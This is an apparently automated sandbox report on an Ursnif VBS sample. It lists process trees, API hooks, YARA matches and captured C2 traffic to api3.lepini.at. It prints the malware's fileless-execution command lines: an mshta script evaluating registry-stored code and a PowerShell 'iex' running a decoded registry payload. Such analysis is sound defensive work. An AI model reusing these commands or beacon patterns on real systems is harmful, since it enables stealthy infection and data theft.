4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Nov 24, 2020 20:36:24.714710951 CET	6441	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Nov 24, 2020 20:36:24.714741945 CET	6443	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Nov 24, 2020 20:36:24.714771986 CET	6444	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Nov 24, 2020 20:36:24.714801073 CET	6446	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Nov 24, 2020 20:36:24.714829922 CET	6447	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Nov 24, 2020 20:36:24.714859962 CET	6448	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Nov 24, 2020 20:36:24.714899063 CET	6450	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Nov 24, 2020 20:36:24.714932919 CET	6451	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
Nov 24, 2020 20:36:24.714965105 CET	6453	IN	Data Raw: 4e 72 9b e7 16 b5 db c8 44 a9 f7 b1 71 65 64 64 60 b1 da 0c 16 8f b8 53 d1 a2 07 c4 2c ce 07 d0 55 a2 ac 93 0a 01 aa a8 21 23 e3 97 b6 bf 91 60 da ad 15 09 b0 d1 eb 48 cd ad 94 47 28 8e bb 58 9a 48 f3 6e 83 e2 8d 01 e1 e8 5f d9 1f 69 c7 21 42 59 Data Ascii: NrDqedd`S,U!#`HG(XHn_i!BY"Rb#Y27)7P="wntU_ ?y]&L=g%Ax} Cr'nv\|&g6wHLTk?N~d>,<AHkPyhv?R
Nov 24, 2020 20:36:24.987858057 CET	6454	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49771	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2020 20:36:32.746280909 CET	6585	OUT	GET /api1/k2_2BPSkEkmXT6PU/zDOxTRpC_2BY4wv/Uc9rQ_2BdQmALihj0b/O35yk81wO/_2BJJsGmcvqJn3WdvBLw/hcTBL2iarC4qZ4YV_2B/9d_2B7Ggs3BnAW23i_2Bde/t9JKt6KAZoSWe/re2dGR19/9ik0fbgVm0bNqFeU0yDPCsA/NCbWTLbFLW/YFtlZWtXaQQ7AvabV/oGahJymIxSEf/eCn4UPTT9W7/4TOvhUziJPirjd/aVzy6CqNvyNL3A4AuKPyc/d_2F7R5E_2FRLkVN/moL_2BcW_0A_0Dg/DfT_2BdqiAs0Ox1XHx/HnIUtWHt_/2F_2Bw1qPKdBjmoNms0Z/zZq7v HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Host: api3.lepini.at
Nov 24, 2020 20:36:34.025243044 CET	6585	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2020 19:36:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49772	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2020 20:36:34.349790096 CET	6586	OUT	POST /api1/ULQHRvwqRb/G8wDpH5qMRHl3_2B4/UEjMLLNvz2cZ/AqaL4_2BQcz/lKb4H9qP6o6VM4/FlSbx_2FrtqOlCmpoRQHO/gmwLzr_2B42eSyBR/YuYftTktOwyZz8p/hMg6srNEseymB6j4aM/TOURtgojN/ejIcLmrrpdo7g5MixpUk/u7YXv1vIle7x1I8w25J/iYIlQpBNQ_2F6_2F52tecp/haAs_2BPE0IZE/BFjaQwUV/3vmY6zByqYDob0bhn9M09Xl/4P5yimux7H/hMxuBTbr_0A_0DFL2/PNs4wicqd7PM/VagjrCBglgI/sb2CcVg_2F8b2O/GuU_2FGPPZ/e HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Content-Length: 2 Host: api3.lepini.at
Nov 24, 2020 20:36:34.349812031 CET	6586	OUT	Data Raw: 0d 0a Data Ascii:
Nov 24, 2020 20:36:35.467319012 CET	6587	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Nov 2020 19:36:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 38 36 0d 0a 6d c1 7e 4a da 7a 5d ab 02 85 8e 5e 16 8a 9d 33 14 94 ff 3d ec 30 9b 8d e2 66 ac 28 02 43 65 9f 8d 11 85 83 37 ea 9a 97 d6 17 ef 6c f8 b8 30 c9 f6 98 89 be 44 d0 bf a1 2e e3 85 da 82 53 46 1f 85 20 ff 52 89 54 4d f4 c4 03 01 74 3a 34 be 58 6f 99 6b 77 8b 67 5a 04 29 6e e6 97 6d 23 a2 56 85 08 28 53 0f fc 3c 0a 3a 10 fb f7 8a 9a 96 b1 9b 3c d8 5c 3c ce 1f 05 2f 12 fc 7f ce 4e 58 07 c1 e2 4f 0d 41 72 0d 0a 30 0d 0a 0d 0a Data Ascii: 86m~Jz]^3=0f(Ce7l0D.SF RTMt:4XokwgZ)nm#V(S<:<\</NXOAr0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DA5020

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFABB03521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFABB035200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFABB03520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFABB035200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	4DA5020

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 6296 Parent PID: 3424

General

Start time:	20:34:11
Start date:	24/11/2020
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0xyZ4rY0opA2.vbs'
Imagebase:	0x7ff779be0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6976 Parent PID: 800

General

Start time:	20:34:39
Start date:	24/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff660d70000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2936 Parent PID: 6976

General

Start time:	20:34:40
Start date:	24/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6976 CREDAT:17410 /prefetch:2
Imagebase:	0xe80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5660 Parent PID: 800

General

Start time:	20:35:25
Start date:	24/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff660d70000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5768 Parent PID: 5660

General

Start time:	20:35:26
Start date:	24/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:17410 /prefetch:2
Imagebase:	0xe80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2212 Parent PID: 5660

General

Start time:	20:35:31
Start date:	24/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5660 CREDAT:82952 /prefetch:2
Imagebase:	0xe80000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 3096 Parent PID: 3424

General

Start time:	20:35:41
Start date:	24/11/2020
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff696f80000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 5976 Parent PID: 3096

General

Start time:	20:35:42
Start date:	24/11/2020
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 496 Parent PID: 5976

General

Start time:	20:35:43
Start date:	24/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 4560 Parent PID: 5976

General

Start time:	20:35:49
Start date:	24/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'
Imagebase:	0x7ff7286f0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 6620 Parent PID: 4560

General

Start time:	20:35:50
Start date:	24/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
Imagebase:	0x7ff6390b0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 1620 Parent PID: 5976

General

Start time:	20:35:53
Start date:	24/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'
Imagebase:	0x7ff6ffe50000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 6896 Parent PID: 1620

General

Start time:	20:35:54
Start date:	24/11/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
Imagebase:	0x7ff6390b0000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: control.exe PID: 7048 Parent PID: 6732

General

Start time:	20:36:01
Start date:	24/11/2020
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff6f9750000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 204 Parent PID: 7048

General

Start time:	20:36:03
Start date:	24/11/2020
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase:	0x7ff6add60000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 5976

General

Start time:	20:36:05
Start date:	24/11/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 3656 Parent PID: 3424

General

Start time:	20:36:20
Start date:	24/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4268 Parent PID: 3424

General

Start time:	20:36:24
Start date:	24/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 2936 Parent PID: 3424

General

Start time:	20:36:27
Start date:	24/11/2020
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1'
Imagebase:	0x7ff622070000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RuntimeBroker.exe PID: 4772 Parent PID: 3424

General

Start time:	20:36:28
Start date:	24/11/2020
Path:	C:\Windows\System32\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6b0ff0000
File size:	99272 bytes
MD5 hash:	C7E36B4A5D9E6AC600DD7A0E0D52DAC5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: conhost.exe PID: 2088 Parent PID: 2936

General

Start time:	20:36:30
Start date:	24/11/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: nslookup.exe PID: 5928 Parent PID: 2936

General

Start time:	20:36:31
Start date:	24/11/2020
Path:	C:\Windows\System32\nslookup.exe
Wow64 process (32bit):	false
Commandline:	nslookup myip.opendns.com resolver1.opendns.com
Imagebase:	0x7ff71c1b0000
File size:	86528 bytes
MD5 hash:	AF1787F1DBE0053D74FC687E7233F8CE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: mshta.exe PID: 3096 Parent PID: 3424 mshta.exeCOMMON

Executed Functions

Function 0000022B0FFB0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000003.842890453.0000022B0FFB0000.00000010.00000001.sdmp, Offset: 0000022B0FFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_3_22b0ffb0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: e9a7e713c9de71e459febeeecc033adcd4c87883712f21df95f27bd3cab932ab
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 6390020479A40A65D41611D10C4D25E5140A398291FD44580441690144DD4D43961192

Uniqueness

Uniqueness Score: -1.00%

Function 0000022B0FFB0FB9, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000003.842890453.0000022B0FFB0000.00000010.00000001.sdmp, Offset: 0000022B0FFB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_3_22b0ffb0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: e9a7e713c9de71e459febeeecc033adcd4c87883712f21df95f27bd3cab932ab
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 6390020479A40A65D41611D10C4D25E5140A398291FD44580441690144DD4D43961192

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: explorer.exe PID: 3424 Parent PID: 5976 explorer.exeCOMMON

Execution Graph

Execution Coverage:	7.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.2%
Total number of Nodes:	1297
Total number of Limit Nodes:	65

Executed Functions

Function 04DCAFB8, Relevance: 11.4, APIs: 5, Strings: 1, Instructions: 912
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 04DCB329

Memory Dump Source

Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: @
API String ID: 1964310414-2766056989
Opcode ID: 5314d47ac38499b3761c766e81e2f58df1e2a23380e3b59c62fbc0fb59a0bd70
Instruction ID: 06c24c4f7564942d0a7e28f7f913ece2d173ee042fc541141c1cf40f98b4d262
